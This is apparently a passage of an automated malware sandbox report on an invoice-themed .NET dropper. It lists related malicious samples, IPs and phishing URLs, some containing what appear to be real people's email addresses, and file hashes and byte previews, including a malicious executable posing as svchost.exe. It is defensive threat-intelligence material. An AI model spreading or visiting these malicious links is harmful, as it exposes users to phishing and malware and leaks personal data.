                                                                                                                    telex transfer.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                                                                                    • 23.227.38.74
                                                                                                                    docs-9035.exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.129.233
                                                                                                                    MPC-PU-FO-0011-00 .exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.134.233
                                                                                                                    JFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                                                                    • 172.67.141.244
                                                                                                                    Njs4kjnD5X.dllGet hashmaliciousBrowse
                                                                                                                    • 104.20.185.68
                                                                                                                    INVOICE_47383.EXEGet hashmaliciousBrowse
                                                                                                                    • 172.67.172.17
                                                                                                                    UKSERVERS-ASUKDedicatedServersHostingandCo-Locationhttps://podcasterz.hu/softaculous/RjcHrladaah1w/Get hashmaliciousBrowse
                                                                                                                    • 31.132.1.41
                                                                                                                    https://caminhodosveadeiros.com.br/h/Ld51n5yo2sVpA9ix2ZHZLqX7/Get hashmaliciousBrowse
                                                                                                                    • 31.132.1.41
                                                                                                                    http://blackbarrymobile.comGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.119
                                                                                                                    https://theautomaticacademy.co.uk/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Creed20200921_2219.pdf.htmlGet hashmaliciousBrowse
                                                                                                                    • 91.109.113.202
                                                                                                                    https://www.linkedin.com/redir/redirect?url=kjifs%2Ehijkrest%2Exyz%2F%405067%4012180%40%2F&urlhash=3yN5&#raju.daswani@fastmarkets.comGet hashmaliciousBrowse
                                                                                                                    • 5.101.151.31
                                                                                                                    https://www.louviers-houseofbeauty.co.uk/fcub/roundcube/index.php?email=marta.valadas@novobanco.ptGet hashmaliciousBrowse
                                                                                                                    • 91.109.113.202
                                                                                                                    https://www.louviers-houseofbeauty.co.uk/fcub/roundcube/index.php?email=marta.valadas@novobanco.ptGet hashmaliciousBrowse
                                                                                                                    • 91.109.113.202
                                                                                                                    http://flamme.coGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.116
                                                                                                                    Quote Order #103888864.exeGet hashmaliciousBrowse
                                                                                                                    • 94.229.65.194
                                                                                                                    isb777amx.exeGet hashmaliciousBrowse
                                                                                                                    • 91.244.181.85
                                                                                                                    http://cs.tekblue.netGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.121
                                                                                                                    ErxMjVrB.exeGet hashmaliciousBrowse
                                                                                                                    • 94.229.71.167
                                                                                                                    juice.exeGet hashmaliciousBrowse
                                                                                                                    • 156.227.195.1
                                                                                                                    3a#U0430.exeGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.243
                                                                                                                    430#U0437.jsGet hashmaliciousBrowse
                                                                                                                    • 178.159.0.38
                                                                                                                    430#U0437.jsGet hashmaliciousBrowse
                                                                                                                    • 178.159.0.38
                                                                                                                    70payment $37,140.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.90
                                                                                                                    30NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.21
                                                                                                                    6LQNTVfdpa.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.12
                                                                                                                    2sapfile_pdf.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.12
                                                                                                                    OBE-EUROPEObenetworkEuropeSEJFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    BMfiIGROO2.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    SLAX3807432211884DL772508146394DO.exeGet hashmaliciousBrowse
                                                                                                                    • 194.32.146.140
                                                                                                                    CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    18.02.2021 PAYMENT INFO.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    DHL_Shipment_Notofication#554334.exeGet hashmaliciousBrowse
                                                                                                                    • 217.64.149.164
                                                                                                                    07oof4WcEB.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    Codes.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.104
                                                                                                                    CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    3yevr0iqCW.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    CN-Invoice-XXXXX9808-19011143287989 (2).exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    Statement.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.162.107
                                                                                                                    Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    DHL_10177_R29_DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    order-181289654312464649.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-181289654312464648.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    Scan_order.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.61

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exePurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                                                                                      3zKVfxhs18.exeGet hashmaliciousBrowse
                                                                                                                        AWB783079370872.docmGet hashmaliciousBrowse
                                                                                                                          DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exeGet hashmaliciousBrowse
                                                                                                                            CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                                              Payment Advice 170221.exeGet hashmaliciousBrowse
                                                                                                                                Payment Receipt.jarGet hashmaliciousBrowse
                                                                                                                                  miner.exeGet hashmaliciousBrowse
                                                                                                                                    875666665.xlsm.xlsmGet hashmaliciousBrowse
                                                                                                                                      DOCX.doc.docGet hashmaliciousBrowse
                                                                                                                                        v.exeGet hashmaliciousBrowse
                                                                                                                                          uaa.exeGet hashmaliciousBrowse
                                                                                                                                            r.exeGet hashmaliciousBrowse
                                                                                                                                              j.exeGet hashmaliciousBrowse
                                                                                                                                                99.exeGet hashmaliciousBrowse
                                                                                                                                                  m.exeGet hashmaliciousBrowse
                                                                                                                                                    n.exeGet hashmaliciousBrowse
                                                                                                                                                      DdV1LG7bLJ.exeGet hashmaliciousBrowse
                                                                                                                                                        TBN HMX SPECS.xlsmGet hashmaliciousBrowse
                                                                                                                                                          VESSEL CONTACT DETAILS, LOAD & DISPORT.docGet hashmaliciousBrowse

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4096
                                                                                                                                                            Entropy (8bit):0.5975851327512959
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:0Fnxllek1GaD0JOCEfMuaaD0JOCEfMKQmDYfutAl/gz2cE0fMbhEZolrRSQ2hyYp:09jTGaD0JcaaD0JwQQYmtAg/0bjSQJ
                                                                                                                                                            MD5:1690D60C794A050032229706F1A3D10C
                                                                                                                                                            SHA1:EAFE954522B89C5F2013F133693158530A1465E3
                                                                                                                                                            SHA-256:0480DEAE9119A63BF1DFE20F5AC6AB01614931B09DCE216F467AEA2A764221E5
                                                                                                                                                            SHA-512:B205889F1A3A87FEA1A82D470E98C6D3663FD75B7A72CD0D766D6E5A0A3B9C887518D37FCF7409942E992098E88030688C1EBC3C1A601ABFAD93EF3A0E425053
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......:{..(......-...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................-...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x95d40a86, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):32768
                                                                                                                                                            Entropy (8bit):0.09625771879899726
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:E80+pzaXO4blCV5djUKi80+pzaXO4blCV5djUK:EzgzJVnGzgzJVn
                                                                                                                                                            MD5:11F32E8BB44083F2E25D79D4B77F5775
                                                                                                                                                            SHA1:679040ABDEB9267694340CFBDEE198D2EAC61CFF
                                                                                                                                                            SHA-256:7A24D6D879D9DA31CF7F786EE7CDE5257FD70675635C0E612DC02CFCE8A60597
                                                                                                                                                            SHA-512:29342B8CD2572C09AC195ED53807467A4A48F8BEC93A68D511B72E215D827D316A95084EA244559BCAD49D54B1873D740D1A0BC5B45B23D298C024F8E0B3A17F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ....... ................e.f.3...w........................&..........w...-...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................|.tO.-...y.....................-...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.11144509983272985
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:gbD1Ev+IIncAr+/t7l/bJdAtiYzxrlll/all:gvQ+IIncAE7t4XdxllG
                                                                                                                                                            MD5:7E1E0C5D8E42457E1EBC55063ABF8900
                                                                                                                                                            SHA1:A1BE2EEC29393988E3B133A3DBEB295054F79FA9
                                                                                                                                                            SHA-256:64C599627275B5A37638535EBAD05F233DC37FB8968F41EE51E7847B65D2C161
                                                                                                                                                            SHA-512:5452EE93D52038458CCCEBB5FC18C80AB74C9E302176C567960F190E6B6A4891A9CE2C1E5A243F80142C858B72D7629489FA91613320ABA0BA7CB76B736E205F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..U.....................................3...w...-...y.......w...............w.......w....:O.....w.....................-...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SSCPUVYAPWRJCSOY_5d6ccfe7d5a2138396f817535b246bb9955b2a_e573b765_184c8058\Report.wer
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16876
                                                                                                                                                            Entropy (8bit):3.779361989604296
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:OsjnytBUZMX+D5aqqp/u7saX4ItxM56/p:OsjoBUiOD5a5/u7saX4ItxMI
                                                                                                                                                            MD5:CD427CF331607D16676E0BBA2C15AB25
                                                                                                                                                            SHA1:A69698C0647828D3F29C3BF0E1A69325A6032147
                                                                                                                                                            SHA-256:1D36AC5EB47906A04E679CFB19B0B344F5FD2F89B58E25B630D64D2B8A927607
                                                                                                                                                            SHA-512:603048432F19D4250D88136015E6C578154CE2EB76CC58D96659B613DAD7B0875DDA78CC622B780129181C99F84214AC20A5786C05627F65AC23988D3DA758CF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.4.8.2.3.5.7.4.7.8.2.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.4.8.2.3.9.8.3.8.4.4.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.c.7.a.4.f.4.-.f.3.c.c.-.4.e.7.c.-.8.b.4.f.-.a.7.c.7.0.8.f.4.8.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.4.0.1.a.2.3.-.b.b.9.1.-.4.7.7.f.-.b.5.7.a.-.b.7.9.f.6.e.2.6.1.d.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.9.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.e.4.-.0.0.0.1.-.0.0.1.6.-.6.0.8.1.-.b.2.b.3.3.1.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.0.0.6.5.1.0.7.f.9.d.a.3.a.6.2.4.c.4.0.a.8.0.e.f.9.f.4.0.a.0.0.0.0.0.0.9.0.4.!.0.0.0.0.e.4.6.3.d.2.1.9.a.1.d.4.d.b.d.e.3.7.5.e.4.f.5.3.c.2.f.c.2.5.0.d.6.e.e.9.d.7.f.
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER106A.tmp.xml
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4799
                                                                                                                                                            Entropy (8bit):4.566271468639747
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cvIwSD8zsgJgtWI9e2hWSC8Bt8fm8M4JpFFD+q8v6zt48crrTd:uITfm1xSNMJtKeFcrrTd
                                                                                                                                                            MD5:844AFF7D37235E2E8A445576524EC9F4
                                                                                                                                                            SHA1:0A71850305BAD95DE090F2BDD4D46A28C591FA5F
                                                                                                                                                            SHA-256:40DC55BF1021ED79EAA2CCAC7A5CA58A0735F672C6F0CB548E4C2C96AC335FE8
                                                                                                                                                            SHA-512:059C142096C91317E884C2C60CEBF49626E3C9474F6282B08A6E781A3958123583B24093C8EB326734A45261A5952653D8FB5C5A7D32C95F1178274E046ECEF0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="872696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B6.tmp.csv
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57152
                                                                                                                                                            Entropy (8bit):3.0488481526810443
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:I1H67I6HF/5tvVeydWwZGPkdmCwipfHF07wD5gptHXUhSwdmOOvRGIDN:I1H67I6HF/5tvVeydWwZGPkdmCwipfHa
                                                                                                                                                            MD5:E6CEA42F3E86569C087C3FD9A64DB6F8
                                                                                                                                                            SHA1:931951637B6762AF983BBE7E6B984783DD7EA708
                                                                                                                                                            SHA-256:4352EEFF578A4C6ED5928FF6517B00A591DF5C745175C55C3C0289DCFD27CCA8
                                                                                                                                                            SHA-512:53768AEE5FA8437B604A7DE90B80DF0540AAAE022331E185F01AE351AD487CF86538E3D04297868CD21BB4DDC81C074D8CB56B7C21C6397AD04B5A4A1D8516E8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A7B.tmp.txt
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13340
                                                                                                                                                            Entropy (8bit):2.7049251281701188
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:9GiZYWWlUYhgEY+Y5pSHHYEZnFtBi6PieOwIKrDLaaBqbUDIKfx:9jZDW5pxwsLaaBqbUMKfx
                                                                                                                                                            MD5:5D5A2FC0D482AB859C851032AC5D4BB8
                                                                                                                                                            SHA1:29F9DCED712DAF860402A3344DBEF3F8654DE99A
                                                                                                                                                            SHA-256:1D5EC13567946C00907FE758055498792FA807379DA8FDCA62074CB8E19DD03B
                                                                                                                                                            SHA-512:3B3537E4BD6C4397F6395A3798D496C72AB506EB144AA8051681797657DA05784CC4A11BD65201D47BC86D1DE7674738EEF934DC41E01B723A9820F844215E04
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER741.tmp.WERInternalMetadata.xml
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8492
                                                                                                                                                            Entropy (8bit):3.710954846877531
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Rrl7r3GLNiR+aM6IY6YIeSUAeINgmfZndSb/CprQ89b1nOsfOnm:RrlsNiYp636YRSUAeINgmfjSba1nNfv
                                                                                                                                                            MD5:FF5873664FCD5B316EA3CA1C89FE5C49
                                                                                                                                                            SHA1:C8E4B9AA8BAAEF9A7BE6E3A00B027CE85150F2F6
                                                                                                                                                            SHA-256:8634C6310F94852DFA26090A153D044FDE16B77BAF43CBEEBB900C9AB1F01B27
                                                                                                                                                            SHA-512:746D5D73C7C22F27FC6EF5AF2671880E15703C53F600BCE460ED3C4D5BE5FB45D2F648FCA96E237B78CB84E7AEB4F8EA32FD5D371C73E89DB910D31F8F358921
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.4.<./.P.i.d.>.......
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCD7.tmp.dmp
                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Feb 22 15:46:09 2021, 0x1205a4 type
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):308516
                                                                                                                                                            Entropy (8bit):3.732502521290974
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:vuWx02jd+pOVhes9gIOgF50FNZi50yU8wUCgUEkgyrWeu/iAeobjkxaU:L0jpe9RpD6Di5l+TjdrWQaj/U
                                                                                                                                                            MD5:DE308525DA996CED860E957C437A02B3
                                                                                                                                                            SHA1:80B40D9956E42E6B5E6817ADAE96CE88904E86C7
                                                                                                                                                            SHA-256:752A5D657439A5670750DE13A982712653D4882DEFC4FE281522AB5902D15EE4
                                                                                                                                                            SHA-512:7C6D1AAD6DE31E563708B67011CCDAB39CED3F0FB027C28E1EFBCEBE1323013996455FD8952CD02658F856FA7DD88D48288C0080909DDB253D2EE14B35146055
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: MDMP....... .........3`...................U...........B......d-......GenuineIntelW...........T.............3`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                            C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):206848
                                                                                                                                                            Entropy (8bit):5.522318927512162
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:OQEpTCImp9zO6/XSTwtPo55rKrFUcDOC53bzf01l:OQJta6/XQIFNMl
                                                                                                                                                            MD5:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                            SHA1:E463D219A1D4DBDE375E4F53C2FC250D6EE9D7F1
                                                                                                                                                            SHA-256:A0EBCB3078763EB8ACCA534831EF9CA1A213347328698AA3CDA7C5BD23CD81D8
                                                                                                                                                            SHA-512:6D13F052BC55D278B3D6A2B0DDD286572D9E45E96FBB8F52F64847B5C93B4E7C21EDCBD2E42CCD096A660C86E1BAFEC84DD45C41195FA0C3533AE1BD1E82D9CA
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..n............... ........@.. ..............................4.....@....................................W....................v.......`....................................................... ............... ..H............text...$l... ...n.................. ..`.rsrc................p..............@..@.reloc.......`.......&..............@..B........................H.......8<...O...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0...........r...p....r...p....s........+...&.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...........:...................o).........o4.......8........*........$.j........0...........r...p....r...p....s........+...'.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...
                                                                                                                                                            C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe:Zone.Identifier
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26
                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
